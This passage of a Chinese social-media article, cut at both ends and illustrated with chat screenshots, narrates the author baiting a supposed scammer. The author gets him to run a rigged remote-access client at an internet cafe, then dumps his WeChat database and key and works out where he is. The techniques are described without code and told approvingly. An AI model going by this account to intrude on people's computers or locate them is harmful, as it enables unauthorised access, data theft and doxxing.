src="https://wechat2rss.xlab.app/img-proxy/?k=888bac3e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnl90jpjfY6QE3qRxYicFibsrWeBcH3fn0SGa1IYJ74xpiaNBjegkg8fy4w%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">88</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金哥为了缓解一下气氛的尴尬，说 <strong style="font-weight: bold;color: black;">《外 汇 我 真 是 一 点 都 不 懂》</strong>。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">可以理解，<strong style="font-weight: bold;color: black;">毕竟是专注计算机技术这一块，这种冷门的金融领域不了解也是人之常情</strong>。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.3679549114331723" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=72aff929&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnT752ic8vgHaOI0gJRicdr6Fzo7Mc45iboPWYrmKXp2AakVib3PDryNYhWQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">89</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">过了没几分钟，金哥不知道去请教了谁，给我发来个BTC钱包地址，问我能不能转。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我心说这货还行啊，这么快弄了个钱包地址来，假装身在美国已经睡去，只读了前两条消息就没再理他。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.1272141706924315" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=6e7c737b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnqxR3WB1yU3q47ncLLb5DViciaibyLs94jvpeXI2E5hHww2Qvg3ZjDQOLg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">90</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">第二天中午我联系金哥，我说你这地址不行啊，我前面说了我是U商，你发我个BTC地址干啥。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.7447665056360708" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=2075968d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnmCtWQopkbmHfznbNt4KaJnCqkmZ5Bcg5mkTXmoj5Ziatp3ucfibZUvTg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">91</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">完事表达了作为金主的不耐烦，看金哥应该是实在没电脑，给他指条明路 —— 不行就去网吧吧。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.893719806763285" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=2cb38456&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnY3Isu5tZ3npgpycwPMYTxNCruiaQbZkeAv3KuPFXyzialLKFnk8lgveg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">92</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">这会儿能看出来金哥是真想要这钱啊，毕竟平时一单几十块，我这一单开张吃三年。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金哥问我能不能等，先给我打个预防针，叫我别不回消息，七点前肯定联系我。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.9887278582930756" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=3eedc609&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnz0qVNU8N4ASUDgTx87dxicibBTx7r3DFibt05Kh4jWc3n0elQknoz82YQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">93</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我心说我得搬砖啊，工地下班哪有这么早，这回终于该有电脑了吧，我紫腚等你。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5700483091787439" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=2c4b5358&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnPAvebby3Qlq0MicpVp7FIMw1633aib2pSlW8gZ2QXruF0pN1RQU5v4Uw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">94</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">过了一会儿，金哥再一次辜负了我，<strong style="font-weight: bold;color: black;">这B不知道又是在哪搜的还是请教了谁，给我发来个TRC20地址</strong>。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.0942028985507246" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=d244daa8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnyD6vhmeViarwDibIIaveWa88BUM9QefHxDuFveyAMjLG5XmH0aRv09yA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">95</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我他🐴一口老血吐出来，<strong style="font-weight: bold;color: black;">你是真不做人啊金哥</strong>。我开始直接隔空表示恼怒了。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.6143317230273752" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=34728981&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn04sPHQNIibATvibKg8IbNwAqNib0zOly7KUicxafbkFDIyOriauKA5RdTAg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">96</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">没交易过的地址会显示地址没激活，我直接截图道德绑架。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.4323394495412844" data-s="300,640" style="" data-type="png" data-w="872" src="https://wechat2rss.xlab.app/img-proxy/?k=3c3d0e2a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnEibgocPiaomLDV51TO0e4B9cvVLeyfia8Sof0Auc8icG87OfHic2NKaPxEA%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">97</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.0789049919484701" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=6aa52cf9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhncz4SpfibADNKALfE5xNvDsKHsOdYEY0riabB9uhibVlxHAFSEIK6Kwpag%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">98</figcaption></figure><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>那你别骗人<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金哥想要我钱啊毕竟，只能由着我（估计金哥看到我的图已经在怀疑教程或者他朋友行不行了）。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金哥说，<strong style="font-weight: bold;color: black;">《那 你 别 骗 人》</strong>。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.428341384863124" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=7fbde5a2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn86uqxLX9GlsrTlKXx6dkicH0kyWdnnRAfEqEicGdfIq7Wx2gOOD84TFg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">99</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">胡萝卜加小棒，金哥再次对我许诺七点。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.4082125603864735" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=a8c285eb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnaWFZD5hwOLQE1mUYbE2EoCjST3UicFxVTKuH60nKWibApE9xhS6OGX4Q%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">100</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">六点多，金哥让我再发下地址。我装作漫不经心，顺带问点别的拉回一下我们对话的主题，避免金哥察觉我们的重心背离。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.3752012882447664" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=9bfe7cf6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnyAAzCxiadJevXiaqy9DHK0JuBg4iaHPvGX3aeogEzLdDB5l6oE1sLiaMsw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">101</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金哥终于真的花钱开了台机子，我颤抖着👋打开金哥的session。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.3924941360437842" data-s="300,640" style="" data-type="png" data-w="1279" src="https://wechat2rss.xlab.app/img-proxy/?k=6786027d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhncpicj813cnnaR3Jd1TFYY2rL9wD7LiaEmuwzPqBlW3JK4jlroMTergibQ%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">102</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金牌黑客，这一刻你终于属于我！</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.0610526315789475" data-s="300,640" style="" data-type="jpeg" data-w="950" src="https://wechat2rss.xlab.app/img-proxy/?k=ab0ce601&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn74gJdCEcuUPXWxM1PUzDYoTrAMiavSbx7tzs3GN5F2B3PkicaVNiaz4hA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">103</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金哥说我这客户端安装不了，我给他推了个真的客户端，跟他说得在云端拉取，你稍微等下。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.8462157809983897" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=f09ec09b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnOHGiaXQBqRY3xI9pfXMicuYfDicAUbQRsjxdSAE1yYUPuMIrXlUzmqQMA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;"></figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">怕金哥着急，我操作的同时也在看着手机怕错过金哥消息，但是金哥却出奇的稳定话少。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.604669887278583" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=fda831b2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnASSD7icSpSWA6FrmocCPA9kxmx5X1DGSaUpbDBQ8cuLXjsLcJwAI5FQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">105</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我看金哥屏幕已经在同步区块了，趁机跟他说得花点时间。此时客户端显示距离同步完还需要14周😂。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5625" data-s="300,640" style="" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=262e1811&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnRa65DhCg44CRLrPC46rpMXzlT62LEF78UMIq2oOGBpefD7ltcOAibIg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">106</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">让金哥去网吧，原计划的首要目的就是看能不能开摄像头拿一张金哥靓照，但是比较操蛋的是这网吧的电脑压根就没有摄像头。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.3138969873663751" data-s="300,640" style="" data-type="jpeg" data-w="1029" src="https://wechat2rss.xlab.app/img-proxy/?k=cfb8cd7f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhneO2XR6alr5bxovgDiaIPBHVlzt3hO25ceibHrt1SrAibfiaX0IAdvfLLUA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">107</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金哥说进度条太慢了，我说一开始慢，你得等会儿。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.1892109500805152" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=c0ecd6de&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnia6BFekILrkpPdXS3HcianP13EicSE7Cc2u676ulDKfkBmeuDaBBgiauuQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">108</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">这玩意确实是先慢后快，刚才是需要同步14个星期，现在变成需要同步3天了。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5625" data-s="300,640" style="" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=8f7a0750&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnExpW9wb5bEibia7zkQofqZEcJMXpHXSTE7dl2vLias3z1dpXibFJhPx3VQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">109</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">跟金哥说需要等会儿，金哥倒是耐心了起来，半天没再找我。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.4049919484702094" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=1ab15065&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhntTmwkVcWSoWVNRHprqCbVJYURjTERIKSbmhiaZCfBhv083VxI5gfWJA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">110</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">确认了网吧机器设备里面确实没有摄像头，我看金哥桌面有个微信，进程里面也确实有wechat，趁着金哥不知道是扣手机还是干啥呢，我赶紧脱个db抓个key</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.35546875" data-s="300,640" style="" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=da8cc10d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn7NFcYia3U25081TrKOpS66IWGYeguaibK9xza25MBtibDHdicntfMh2wJw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">111</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">又翻了一通感觉确实没啥东西了，金哥这会儿其实已经价值不大了，我干脆问金哥有没有支付宝，套路个账号还方便搜索下。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金哥还有点不死心，毕竟支付宝的话可能就不是2000U了。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.5491143317230274" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=371610fc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnrOY1wnnWCvanJPMtBvfBODW180MfhZHiakwsFFeKIzOaMTCZ6UIeMPg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">112</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">此时看他也不回话，屏幕也不动，寻思能不能冒险偷偷动下鼠标到右下角网吧管理软件之类的上面，弄出来地址显示，看看这是哪家网吧，定位下金哥位置。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.16119402985074627" data-s="300,640" style="" data-type="png" data-w="670" src="https://wechat2rss.xlab.app/img-proxy/?k=b67636e1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnmDFJWIJibEL2bUOVhN96ibop6DgSVSg44q07dHCkibh1HTBiavrTcsXs8g%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">113</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我远程过去的时候，页面显示确是网吧的锁屏界面，刚好我什么都不做，直接就能看到网吧名字了。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.621875" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=40687df0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnWWPdOCaAp8TFIlGtoiccJhq2iczTSZicQpVNOibibortdHwyuW3uiaBJrzEg%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">114</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">那时候还没看到金哥的微信号，不知道他是2003年生人，已经20岁了，以为他只是个小学生、初中生之类的。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">于是迅速定位了下周围的学校，倒也却没有发现特别明确的目标。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.67421875" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=41fd61cc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnVkn389j6St5mZucS3vl8Upeem7x8wm3LkU8C1XKoOLyAFvdrL0N8KA%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">115</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">后来就是问金哥要支付宝，金哥发来个xx涵，估计也不是本人的。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.7214170692431563" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=14d068d5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn9JAnbSnMOLqtqMG8ib6hOKIuC3sClXaDuHlJOwXkDXbkNCm9ibln0H1g%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">116</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">套路了下也没套路来手机号，金哥后来发消息我就没理他了。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.608695652173913" data-s="300,640" style="" data-type="jpeg" data-w="1242" 